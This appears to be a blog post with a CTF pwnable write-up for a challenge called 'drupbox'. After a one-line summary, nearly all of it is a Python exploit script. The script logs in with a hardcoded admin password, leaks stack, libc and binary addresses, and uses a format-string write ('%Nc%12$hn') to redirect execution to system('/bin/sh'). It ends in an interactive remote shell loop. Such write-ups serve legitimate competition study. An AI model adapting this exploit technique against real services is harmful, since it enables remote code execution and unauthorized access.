Overview
Category : Pwnables
File :drupbox
Summary : make failure chdir(), get admin password, 13byte fsb
Exploit
#!/usr/bin/python
from socket import *
from struct import pack,unpack
p = lambda x:pack("<L",x)
s = socket(AF_INET,SOCK_STREAM)
s.connect(("localhost",8887))
raw_input()
print s.recv(1024)
s.send("1\n")
print s.recv(1024)
s.send("admin\n")
print s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
print s.recv(1024)
s.send("2\n")
print s.recv(1024)
s.send("XXXX\n")
print s.recv(1024)
d = s.recv(1024)
stack = unpack("<L",d[4:8])[0]+0xa4
lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000
code = unpack("<L",d[32:36])[0] - 0x1197
print hex(code)
system_addr = lib+0x41260
system_arg = stack - 0x38e
read_plt = code + 0xbd0
pppr = code + 0xf47
print hex(stack)
print hex(lib)
raw_input(">value")
num = ((stack&0x0000ffff) - 4)-926
payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)
s.send("4\n")
s.recv(1024)
s.send("1\n")
s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n")
s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
s.recv(1024)
s.send("5\n")
s.recv(1024)
s.send("%"+str(num)+"c%12$hn")
raw_input(">")
s.recv(1024)
while 1:
comm = raw_input("$")
if comm == "exit":
break
s.send(comm+"\n")
print s.recv(1024)'CTF > 2014' 카테고리의 다른 글
| CODEGATE CTF 2014 QUAL - weird_snus (0) | 2014.04.20 |
|---|---|
| CODEGATE CTF 2014 QUAL - 4stone (0) | 2014.04.20 |